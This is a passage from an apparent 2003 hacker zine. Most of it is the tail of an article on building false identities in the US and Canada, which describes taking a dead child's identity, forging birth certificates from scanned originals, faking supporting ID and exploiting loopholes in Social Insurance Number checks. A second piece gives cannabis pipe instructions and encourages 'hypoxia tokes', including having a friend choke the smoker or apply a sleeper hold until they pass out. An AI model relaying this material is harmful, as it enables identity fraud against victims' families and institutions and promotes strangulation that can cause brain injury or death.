coming to the US to work (this applies to Canadians and Mexicans).
If you're looking at this list wondering whether you can utilize any of
the above methods to enter and live in the US, I'll try to give you a few
pointers. The US administration does actually investigate each
individual request for work, study or cultural visas. They will want to see
background information on you if you are claiming to be some kind of
specialist. If you are being offered a job they will check that the company
does exist and wasn't formed just a few days ago. Some ideas for foreign
nationals
If, for example, you are from a European country and are wondering
how you could create a new ID and pass yourself off in the US as a
citizen of that country, why not turn your problem to your advantage? It
is possible to be a US citizen and still be born and brought up in another
country. How? Easy, if one of your parents was a US citizen, lots of
people have traveled overseas, then met and married someone abroad. If
one of your parents was a US citizen, then you are automatically a US
citizen too. The US administration will need to authenticate your claim.
You'll need to prepare some documentation for your US parent -
probably a copy of a verifiable birth certificate. Or, alternatively, you
could claim to have been born in the US and then taken overseas as a
child. Again, you would have to verify this claim.
Or, here's another idea. Why not try one of the above methods, but also
as a backup plan try the same scheme with Canada? If you can get
Canadian citizenship it's then easy to enter to the US anyway (you only
need a drivers license to cross the border - a passport isn't necessary).
You can also work in the US indefinitely if you are a professional with a
college degree (or the equivalent) under H-1B or TN visa status.
LINKS (USA)
Mail-order books on new ID
www.paladin-press.com
www.edenpress.com
www.loompanics.com General resources
www.buildfreedom.com/ft/identity.htm Info on new ID
www.buildfreedom.com/ft/social_security.htm Info on social security cards
www.escapeartist.com Magazine for people living abroad
www.lds.org Mormon Church - very useful for genealogical research
--------------------------------------------------------------------------------
Government information
www.vitalrec.com Contains links to US records
www.fedworld.gov Search for Federal Govt info
www.state.gov US State Dept (passport info)
www.ins.usdoj.gov US Immigration and Naturalization Service
(Forms to download. Info on eligibility for immigration)
www.dol.gov US Dept of Labor
www.ssa.gov US Social Security Admin (informative, good search engine)
WHY CANADA?
Canada is a very cosmopolitan country, with a great mix of
nationalities. Toronto and Vancouver are two of the world's most racially
mixed cities. It will not be regarded as being unusual to have a foreign or
strange accent. Not only are there a lot of newcomers in Canada, but also
many native Canadians have lived abroad (eg studying or working in the
US) and they can come back to Canada with, for example, American
accents. So, what I'm getting at is that it you, as an outsider, will not
stand out in Canada. I should just mention here, for the benefit of those
people reading this who are from outside North America, that accents,
pronunciations and use of words do vary across the USA and Canada.
There are some accents that are obvious to the outsider (eg, New York or
the deep south), but there are also much subtler differences. So even
though someone from Vancouver (Canada) may sound very similar to
someone from Seattle (USA), there would be subtle differences in their
speech. One particularly noticeable difference between Canadians and
Americans is that Canadians pronounce certain words the same way as
English people.
The moral of all this, I think, is that if you intend to assume a new
identity in Canada, it's going to be a lot easier for you (if you're not
actually a native Canadian) to openly admit that you've spent most of
your life overseas and not in Canada.
The second advantage of Canada is its ease of access to the US.
Canadian citizens need only to carry their driver's license to cross the
border. There are no visa formalities. It is also possible for Canadians
to work in the US, subject to certain formalities.
A third advantage that Canada has is its own low cost national medical
system. For a monthly payment (about $36 (Cdn) currently) you are
covered in Canada for medical treatment.
GENERAL PRINCIPLES (CANADA)
Much of what was written about the USA applies, in general terms, to
Canada. As in the USA the advent of computers has made crosschecking
documents much easier, although (similar to the US) this is slightly
complicated by the fact that Canada is split into Provinces (as the US is
split into states). There has been as yet no attempt to criminalize those
attempting to obtain a new identity - there is no specific legislation on
this subject, and there is probably unlikely to be so. It's not regarded as
an issue requiring attention. Most of the world seems to want to live in
the US, not Canada.
As in the US, you'll need a mailbox because much of the procedure can
be done by post.
So, what ID do Canadians have?
Birth Certificate. If you're not familiar with Canada, you'll be surprised
to find that people carry a credit card sized birth certificate actually on
them, and (unlike the USA) these are considered as proper ID (although,
of course, they don't carry a photo - they wouldn't, would they, it's a birth
certificate). The large paper certificates have not been issued since the
early 1960's, when they were replaced by laminated cards, and since the
early 1990's cards printed on green bank note type paper. The cards carry
the following information: name, date of birth, date of birth registration,
birthplace, sex, registration number, and in some provinces a certificate
number Those people who are Canadian citizens, but who were born
outside of Canada carry a credit card sized Citizenship card (with a
photograph). Until the middle of the 1990's birth certificates were issued
in Quebec only by the Church - this meant that the authorities had no
means of verifying these certificates when they were presented as proof
of ID. A recent high profile terrorist case has forced the authorities to act
and now these Church birth certificates are not regarded as valid proofs
of ID.
Social Insurance Card.
A wallet sized plastic card with your social insurance number and
signature. Carried by everyone and considered (again, unlike the USA)
proper ID, because you need to be a legitimate resident to have one. The
card is necessary if you wish to gain employment in Canada - any
employer will ask for your social insurance number and Revenue Canada
will immediately pick up any wrong numbers. However, non-residents
are actually allowed to start businesses in Canada (Canada still
encourages immigration and investment), although theoretically you are
not actually supposed to work in any business you start, although people
obviously do.
Medical ID card, allowing you free medical treatment across Canada.
Drivers License. Obviously you need one if you wish to drive, but it also
acts as your photo ID. Those people that don't drive carry a Provincial ID
card as their photo ID.
FORMS OF ID (CANADA)
A. Birth Certificate
B. Social Insurance Card
C. Medical ID Card
D. Drivers License
E. Citizenship Card A. Birth Certificate
A birth certificate is the foundation document of your Canadian identity.
People seeking a new identity have the choice of either faking a
certificate, or obtaining a copy of a real certificate actually issued to
someone else and using that one.
This last method involves using the well-publicized procedure of
borrowing the identity of someone who died as a child. The idea being
that you look in old newspapers or on old gravestones for the details of
a deceased child, who, had he lived would be the same age (roughly) as
you are now. You then apply for a copy of his death certificate, which
should give you enough information to apply for a copy of his birth
certificate. When you have the birth certificate you have the foundation
of a completely "virgin" identity - virgin because there will be no social
security numbers, criminal records, and so on, in that name because the
child never lived into adulthood. However, because of the ease and
simplicity of this plan, it's very likely that if you find a suitable identity
to borrow, someone else may have already got there before you. But the
problem is you won't know that, until you start applying for drivers
licenses, etc, and you have the police visiting you, wanting to know why
there are two people with the same name, same birthday and same place
of birth.
Reproducing one of the modern card type birth certificates would be
difficult for anyone unless they were skilled in such matters. It is
technically possible, if you have the necessary computer equipment,
including a high quality scanner and printer, and also the correct paper,
which is of a bank note type. However, it would probably be a lot easier
to approach someone in the US to reproduce one for you.
The older type large paper certificates (used until the early 1960's)
would be much easier to reproduce on a home computer. If you want to
look at a certificate from this period, look up the birth announcements in
an old newspaper and apply for a copy of the certificate. As in the US,
theoretically only eligible applicants (ie next of kin) can apply for a copy
of a certificate, but it would not be difficult to manufacture some fake ID
to satisfy this requirement. Birth certificates in Canada are issued by
individual provinces, not by the national government.
An older type certificate could be scanned into a computer, the details
erased and replaced with new details, and a new certificate reproduced.
Unlike US certificates, Canadian ones do not have any embossed or
raised seal, and they were printed on the same paper across Canada
(whereas in the US this varied from state to state, county to county, year
to year).
You may think, what use is one of the old type certificates to me -
surely I need one of the newer card types? Well yes, you do. But you
could always apply to the Vital Statistics Agency in the province where
you were "born" to change your certificate for a new type, saying you
were born in Canada but had left the country as a child with your parents,
hence you did not have a current type. The only potential problem here
being that the Vital Statistics Agency could recognize your document as
a fake if it chooses to do a check on its validity by analyzing and
crosschecking the birth registration number on the certificate, plus in
some provinces there is also a certificate number.
B. Social Insurance Card
The Social Insurance Number (SIN) was introduced in 1964 to provide
Unemployment Insurance, Canada Pension Plan and Quebec Pension
Plan clients with a file number. Then in 1967 it became a file identifier
for Revenue Canada. In 1976 the Proof of Identity Program was
established to verify the identity and status of applicants for SIN's. The
Human Resources Department of Canada (HRDC) is responsible for
issuing SIN's and maintaining the database.
Employers must ask to see the SIN card of all new employees and the
employee must show it within 3 days of starting employment.
The HRDC is aware that there are problems with the issuing of SIN's
and the maintenance of the database:
Not all deaths are recorded nor departures from the country, causing a
significant gap between the number of SIN holders and the size of the
population - in 1999 there were 3.8 million more SIN's allocated to
people 20 years or older than there were people living in Canada in that
age group.
No program currently checks revenue data and Employment Insurance
data to determine whether a SIN remains in active use. THIS IS
CHANGING - SEE BELOW.
Many temporary SIN's are issued (for example to asylum seekers,
temporary workers, etc) but no expiry date is assigned to the cards - the
SIN can be used indefinitely. Between 1976 and 1999 1,242,000
temporary SIN's were issued. In 1998 some 680,000 of these SIN's were
still in use, and 60% were over 5 years old - a long period of time for a
temporary number. This is obviously caused by SIN holders remaining in
Canada long after they are entitled to.
Data is not shared between different government programs. For example,
Revenue Canada does not provide the SIR (Social Insurance Register)
with corrections it makes to taxpayers files when it notes discrepancies
in date of birth, name, etc.
Currently there is no attempt to verify documentation presented as proof
of ID (eg. birth certificate) when an application is received for a SIN.
This is largely because at its inception, the SIN was intended purely to
act as a file identifier (account number) for certain government programs.
It is only since then that it has come to be regarded as a personal
identifier, or even as an identity card. THIS IS CHANGING - SEE
BELOW.
There are few effective measures to prevent SIN fraud. The Employment
Insurance Act states that the penalty for committing any offences related
to the SIN is a fine of up to $1000 and/or imprisonment for up to one
year. Very few perpetrators are caught, and even then, criminal charges
are rarely brought.
In general, mailed applications are believed to represent a greater risk of
fraud than in-person applications because certified copies are accepted,
which themselves could have been certified fraudulently. THIS HAS
CHANGED - SEE BELOW.
There is a site on the web that will do the verification for you on-line
(www.sirius.on.ca/running/sin_check.html).
Applying for a number you need a primary piece of identification (most
people would use a birth certificate or citizenship card) and you would
apply in person at a Human Resources Centre of Canada, HRCC (these
used to be known as Canadian Employment Centers). It is possible to
apply by mail order if you live in a remote location, so if you preferred to
do it that way you could rent a mail box in a remote town.
It is not unusual for older people to be granted numbers because there is
a constant flow of migrants coming to settle in Canada.
Human Resources Development Canada has an excellent web site full
of information about applying for a Social Insurance Number
(www.hrdc-drhc.gc.ca).
Changes announced October 2002, "to protect the integrity of the SIN"
Because of the flaws in the system, the HRDC announced a number of
measures to fight fraud and abuse of the SIN:
Only original documents will be accepted as proof of ID, and the number
of acceptable documents is being reduced. So it is no longer possible to
send certified copies by mail. Henceforth, if applying by mail, you need
to send the originals.
Since August 1, 2002, baptismal certificates from Quebec or
Newfoundland have not been acceptable as proof of ID.
Effectively immediately, the HRDC will deactivate any SINs that have
been inactive for 5 years.
The HRDC is seeking to introduce expiry dates for all people who are not
Canadian citizens or permanent residents.
HRDC staffs are being trained to recognize fake documents, and use such
techniques as are necessary (eg ultraviolet light)
In addition, the HRDC is working on a project to verify birth information
provided by applicants with the vital statistics departments in all the
various provinces. So far, they have done this with New Brunswick, and
are currently working with British Columbia.
C. Medical ID card
To obtain a card, contact the local office of Medical Service Plan and
they will send you a form to fill in. The forms vary from province to
province, but generally only require basic information and a copy of a
birth certificate. If a social security number is requested, it will not
necessarily be crosschecked. It's only required in case at some time in the
future you become unemployed and request premium assistance.
D. Drivers License
It's a PVC card showing a photo, date of birth, address, license
number, date of issue and expiry, signature, eye color, hair color, weight,
height, and sex.
Apply in person to your local Motor Vehicle Office (look in the "Links"
section below to see links to offices in different provinces). The system
is administered at provincial level, so varies slightly from province to
province. You will be required to take a written or computer test, and an
actual road test. You don't need to provide a social insurance number
(unlike the US). In British Columbia, for example, you need to provide
two proofs of identification, Primary and Secondary.
Primary can be:
Birth certificate
Canadian citizenship card
Canadian record of landing (a document issued to migrants to Canada)
Canadian student visas
Canadian work visa
Returning resident permit
Secondary can be: passport
Driver's license, issued by Canadian or American jurisdiction
Provincial ID card
Naturalization certificate
Canadian forces, Police, Consular or Foreign Affairs Canada ID card
Marriage certificate or change of name certificate issued by Vital
Statistics
If you don't drive or don't want to take the driving test, you can still
get a Provincial ID card from the Motor Vehicles Office to act as your photo
ID. The procedure and information required is similar to applying for a
driver's license, but without the driving part.
E. Citizenship Card
The card is automatically issued to naturalized Canadians when they
are granted citizenship. Canadian citizens only get a card if they apply for
it. It is intended as identification or proof of citizenship if the holder
is applying for a job or passport.
The card has not been modernized since 1989 and there is concern in
Canadian authorities that the card is being faked because it lacks modern
technology (e.g. holograms, etc).
LINKS (CANADA)
www.canada.gc.ca/othergov/prov_e.html list of provincial govt sites
www.cic.gc.ca Citizenship and Immigration Canada
www.hrdc-drhc.gc.ca Human Resources Canada (info on Soc Ins No.s)
www3.gov.ab.ca/gs/services/mv Alberta Motor Vehicles (driver license info)
www.icbc.com/Licensing/index.html British Columbia Motor Vehicles
www.mto.gov.on.ca/english/dandv/driver/index.html Ontario Motor Vehicles
www3.gov.ab.ca/services/vpe Alberta Vital Statistics
www.hlth.gov.bc.ca/vs British Columbia Vital Statistics
www.ccr.gov.on.ca/mcbs/english/welcome.htm Ontario Vital Statistics
For provincial govt motor vehicle and vital statistic sites I have only
shown links to three of the largest - other provinces either have no sites,
or have only very basic sites with little information.
2003
---
<theclone> lets both piss into a toilet at the same time and let our streams
touch so it will be like on ghostbusters where they cross the streams and it's
"bad", but it kills Zuul.
---
The Ice Hooter: One hit shit!
by phlux
Well i've never seen plans for an ice hooter anywhere, which
is unfortunate. They are pretty fucking rude.
Blade hits are very effective, and combined with the ice hooter,
your weed can last quite some time. As the title suggests, even
some jag off weed can be turned into some one hit shit.
First make some ice cubes, use a tray that makes the larger cubes.
Clean a 2 litre plastic pop bottle, and cut the bottom off where
the sucky ASCII art depicts;
---- <-neck
____
' '
/ \
| | <-indentation, where label begins
| |
| |
| |
| |
| __ |<-bottom indentation, cut here
\_/ \_/
Now punch a decent sized hole in each of the nipples
Put the ice cubes in the upturned top portion of the bottle,
and use the bottom to hold them in place, wrapping flexible
middle plastic of the bottle back, holding it all together..
like so;
---- <-weed smoke comes out here
____
'cCcC'
/ ____ \ c is the cubes
|/ \|
* * <-plastic rolled back
If you spend abit of time wrapping back the plastic, you should
get a good seal, some pliers may help. If you want to take it
up a notch, score the area with some sand paper or whatever,
and use hot glue. Dont make too big of a hooter, otherwise
you will be inhaling unnecessary air. With a good seal you
can fill the hooter with a little water.
You can serve up some big hot knife hits, and as you're inhaling,
you will wonder if it is just air, as the smoke will be hidden
within the fogged plastic.
It goes down nice and easy. Keep inhaling, and don't exhale
till you can't hold it in any longer.
When you exhale, you should cough and hack, gasping for air
half way through exhaling. This is a good sign of a good toke.
The ice hooter is good for hypoxia tokes, idealy with some good
hash or oil. Take a little toke, but hold it in till you pass out.
Holding your breath till you pass out is not a danger if you are
healthy, with a lung full of weed smoke it is just fun.(according
to my grade 9 science teacher, minus the weed bit)
However, if you don't wake up after doing this, I will not be held
liable. Therefore, I would save this toke for special occasions.
Your lungs can't be too happy about taking in an entire toke either..
I have never had such an intense body high as my first hypoxia toke.
It is fucking wild.
Bury your chin in your chest to hold the toke, do not hold
your breath with your throat muscles, this is not good.
Only do this in a safe place like on a couch or bed, when you
pass out, your muscles will breifly spasm much to the delight
of the audience.
Expect to experience a short period of amnesia after doing this..
for me it was maybe 2 minutes, but I couldn't even remember who
I was or where I was, or who the people were that were laughing
at me once I remembered I had ears!
Rather then running around and then having someone bear hug you
into never never land, this is a better way of embedding sigils.
If you have trouble holding your breath, have a friend press the
side of his hands tightly around your neck, including, and only
the pinkies, constricting blood flow to the brain, but with no
pressure on the throat. Naturally this should be easier when
your are already a little intoxicated.
A japanese strangle(sleeper) hold would work well, ensuring the
person has safe arrival to the floor.
I have also heard such tokes beind called wall tokes, as the
recipient can alternatively stand against the wall, and the
assistant(s) can lull the person onto the floor, ensuring s/he
does not fall backwards.
During a dry spell(if your ice hooter has seen alot of use)
you could try melting the ice cubes and drinking the water.
Let me know how that goes eh
If you have power lungs, the ice hooter is also good for doing
nostril tokes. Enjoy!
06/08/03
---
<colt45> clone come to toronto and I can show you my hotrod
---
__ __ __ __ __ __ __ __ _____ _____ _____ _____
__ __ __ __ _____ _____ __ __ __ __ _____ _____
__ __ _____ __ __ _____ __ __ _____ __ __ _____
* Credits
Without the following contributions, this zine issue would be
delayed or not released. So thank you to the following people:
Cyb0rg/ASM, CyberSk4nk, Dunter, Fractal, jdm, Kybo_Ren, Phlux,
Son4r, Seuss, Team Bawks.net, The Clone, Unknown, and Voyager.
* Shouts
Cyb0rg/ASM, Wildman, H410g3n, Wizbone, warVamp, The Question, plappy,
Phlux, rt, Magma, Hack Canada, The Grasshopper Unit, Flippersmack,
soapie, Alan, Flopik, dec0de, caesium, oz0n3, Kris, Grinthock, Coercion,
most of to2600.org, Ms.O, Ms.V, Willow, Ann, and lastly to everyone and
anyone who contributes to the ever growing Canadian Hack / Phreak scene.
_ ___ ___ ___ __ ___ ___ .__ ___ ___ ___
/\ / /\ / /\ / /| |/ / /_ ||__| ___ ____ / /\ / /\ / /\
//\/ ///\/ ///\/ //| / __ | || |./ \ / __ \ / ///\/ ///\/ ///
/// /\/// /\/// /\/| | \ /_/ | || || | \/ ___// /\/// /\/// /\//
\/__/ \/__/ \/__/ \| |\__\ |__||__||__| /\___ /__/ \/__/ \/__/ \/
\ | \/ \/
\ |
\|
'
Nettwerked.Net 2003